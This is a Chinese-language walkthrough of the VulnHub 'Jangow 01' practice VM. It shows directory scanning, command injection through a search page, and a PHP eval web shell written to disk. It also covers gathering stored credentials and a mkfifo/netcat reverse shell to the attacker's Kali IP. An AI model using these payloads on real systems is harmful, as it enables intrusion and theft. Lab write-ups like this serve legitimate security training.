首先,这个靶机只能使用VirtualBox打开,靶机下载地址为
https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova
虚拟机软件下载地址为
Download_Old_Builds – Oracle VM VirtualBox
开启靶机后访问ip进入如下页面,点击site进入到一个网站,我们用kali中的dirsearsh扫面一下目录
扫到以下目录,没有什么有用的,然后我们在网站首页找一找有没有什么有用的东西
点击buscar后进入一个可以传参的页面,我们输入一点查询的东西看看是否可以利用,输入id后发现成功回显
那么我们直接上传一个一句话木马,利用如下语句
echo '<?php eval($_POST["cmd"]);' > 1233.php
尝试访问一下发现访问成功,那么我们直接用蚁剑去尝试连接也成功连接
我们在系统中翻找一下,发现了worldpress与html/.backup中都有账号和密码,虽然不知道在哪里登录,但是先记下来
然后我们尝试反弹shell,这里需要使用mkfifo 命令创建命名管道反弹shell,首先利用蚁剑在/var/www/html/site下创建一个名为1.php的文件,内容如下,其中端口为443,ip为kali的ip
<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.233.128 443 >/tmp/f");?>
然后在kali中开启443的端口监听,并用浏览器去访问443端口